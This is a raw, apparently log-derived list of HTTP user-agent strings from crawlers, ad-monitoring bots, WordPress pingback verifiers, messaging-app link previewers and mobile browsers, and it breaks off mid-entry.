https://papodeboteco.net +WordPress/5.2.11; https://artetimage.ecolekourtrajme.com; verifying pingback from 174.75.211.222 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628213049-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628213047-10 +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler+aardwolf-crawler-43@moz.com) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628211552-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628217314-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628249843-0 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; GoogleAdwordsExpress) Chrome/92.0.4515.119 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-demand/1628286084-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-demand/1628286092-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 PTST/210806.173016 +Google/Pixel 4a (Linux;Android 11) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Mobile Safari/537.36 PTST/210806.173016 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628297239-0 +WhatsApp/2.21.151.2 i +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628303703-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628307177-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628307465-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628351655-0 +Mozilla/5.0 (en-us) AppleWebKit/537.36(KHTML, like Gecko; Google-Adwords-DisplayAds-WebRender;) Chrome/92.0.4515.119Safari/537.36 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Proxy; Android 8.1.0; vivo_1820 ) U2/1.0.0 Mobile +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 +WordPress/5.7.2; https://fermosa.me +WordPress/5.8; http://embracingthegrey.com; verifying pingback from 104.144.83.81 +WordPress/5.3.2; https://www.tomove.com; verifying pingback from 104.144.83.81 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628383196-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628389082-0 +WordPress/5.7.2; https://karihumi.com +WhatsApp/2.21.151.1 i +WordPress/5.8; https://eccria-conferences.org +WhatsApp/2.21.15.20 A +WordPress/5.3.8; https://sipnn.ru +WordPress/5.8; https://httl.com.vn/en +WordPress/5.8; https://funportal.info +WhatsApp/2.21.16.10 A +WordPress/5.1.10; http://www.rooty.top +WordPress/5.1.10; http://www.rodoo.top +WordPress/5.1.10; http://www.koodx.top +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628473592-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628484555-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628504610-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628470255-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628477023-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 +WhatsApp/2.21.15.19 A +WordPress/5.8; https://cdn.howpedia.net +ddg_android/5.92.1 (com.duckduckgo.mobile.android; Android API 30) +WordPress/5.8; https://et-code.ru +cURL: curl/7.13.1 (powerpc-apple-darwin8.0) libcurl/7.13.1 OpenSSL/0.9.7b zlib/1.2.2 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1628543894-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628504769-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628504770-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628504771-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628504781-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628621876-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628567109-10 +DuckDuckGo/0.12.0 CFNetwork/1240.0.4 Darwin/20.5.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628607257-10 +WhatsApp/2.21.17.1 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628557035-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628562695-0 +ddg_android/5.92.1 (com.duckduckgo.mobile.android; Android API 24) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.3.0.1130 (SpeedMode; Proxy; Android 9; SM-C111 ) U2/1.0.0 Mobile +ddg_android/5.92.1 (com.duckduckgo.mobile.android; Android API 29) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 4.4.2; IdeaTabA1000-G ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628575592-0 +WordPress/5.8; https://luzablue.org +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 7.1.1; SM-N900 ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 5.1.1; GT-S5360 ) U2/1.0.0 Mobile +WordPress/4.9.4; https://kictpoe.linkit.me +WordPress/5.5.4; http://www.mobilemarketingtrial.com +WordPress/4.9.8; https://physics.iitm.ac.in/~ramp/aenl +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628662978-10 +Crawl +WhatsApp/2.21.17.4 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628643363-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628649944-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628664346-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628673726-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628673727-0 +WhatsApp/2.21.17.2 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628706743-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628712950-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628660856-0 +WordPress/5.8; https://stocks.ru.com +WordPress/5.8; https://skolkogramm.ru/info +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 7.1.2; AS-5433_Secret ) U2/1.0.0 Mobile +Botbox TV/1.0 (Linux;Android 8.1) ExoPlayerLib/2.11.3 +WhatsApp/2.2130.9 N +WordPress/5.8; https://www.itcandy.cn +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.3.0.1130 (SpeedMode; Proxy; Android 5.0; HTC_Desire_601_dual_sim ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Google-Apps-Script; beanserver; +https://script.google.com; id: UAEmdDd-GGVZOd_EeSkXhrATYzsLJv5ypxA) +WordPress/5.7.2; https://arobidriver.me +WhatsApp/2.21.17.5 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628812196-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628729181-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628735638-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628758839-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628806086-0 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/92.0.4515.119 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 6.0; SM-J330G ) U2/1.0.0 Mobile +WordPress/5.8; http://centria.info +WordPress/5.8; https://blogchain.com.ua +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 7.1.2; SM-J330G ) U2/1.0.0 Mobile +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/91.0.4472.114 Safari/537.36 Prerender (+https://github.com/prerender/prerender) +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.120 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Wingmenbot +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 OPR/77.0.4054.277 +WhatsApp/2.21.17.6 A +WordPress/5.8; http://seoitsecurity.space +WordPress/5.7.2; https://undergroundrailroadhistory.org; verifying pingback from 45.73.0.118 +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler+aardwolf-crawler-35@moz.com) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628846633-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628855403-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628855480-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628816002-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628823130-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628852861-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628861713-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628861762-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628882359-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628898597-0 +WordPress/5.7.2; https://www.expobizitsolutions.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628859806-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628859866-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628859806-60 +ddg_android/5.93.0 (com.duckduckgo.mobile.android; Android API 29) +Mozilla/5.0 (Linux; Android 4.4.4; Nexus 5 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.102 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628859805-0 +WordPress/5.8; https://computer-mouse.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628859866-10 +Transmission/3.00 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628900145-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628907048-0 +curl/7.46.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628900724-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.64 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628907588-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628903006-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628909317-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628945174-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628949270-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628971909-0 +Java/1.7.0_07 +Debian APT-HTTP/1.3 (0.8.16~exp12ubuntu10.26)" +NaverMailApp/2.2.1 (Android 9; SM-A405FN) +PHP/7.3.53 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628986734-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628993772-10 +WhatsApp/2.21.17.12 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629028726-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629056174-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629057900-10 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1629060120-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628989276-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628995893-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629007152-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629013835-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629037200-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 7.1.1; IdeaTabA1000-G ) U2/1.0.0 Mobile +WordPress/5.8; https://aktifqq.cc +Mozilla/5.0 (compatible; Google-Apps-Script; beanserver; +https://script.google.com; id: UAEmdDd8gzj2mAbh5wekEJF7XNMojGKf-y1A) +PHP/6.3.33 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629074380-10 +WordPress/5.7.2; https://iniciarbr.net +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629075726-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629079876-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629079877-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629082475-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629095920-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629096488-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.67 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629132335-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629139216-0 +Mozilla/5.0 (compatible; YandexDirect/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.268 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1629080921-0 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko GomezAgent 3.0) Chrome/56.0.2924.87 Safari/537.3 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 PTST/210806.173016 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.115 Safari/537.36 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 5.0.1; SM-J330G ) U2/1.0.0 Mobile +PHP/6.2.48 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629209632-10 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Mobile Safari/537.36 PTST/210806.173016 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629232533-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629232597-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629161662-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629167949-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629204443-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1629212488-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629220202-0 +WhatsApp/2.21.17.14 A +WhatsApp/2.21.17.13 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1629244073-0 +Mozilla/5.0 (X11; Linux x86_64; rv:90.0) adbeat.com/policy Gecko/20100101 Firefox/90.0 +WordPress/5.8; https://wordpress-629556-2101733.cloudwaysapps.com +GoogleAuth/1.4 (j3topelteacg PPR1.180610.011); gzip,gzip(gfe),gzip(gfe) +GoogleAuth/1.4 (setzer_cheets R86-13421.99.0); gzip,gzip(gfe),gzip(gfe) +WhatsApp/2.21.16.20 A +WhatsApp/2.21.17.15 A +WordPress/5.7.2; http://thenorthface-rain-jackets.com +PHP/5.3.30 +WordPress/5.8; https://rucore.net/p +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.55 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; 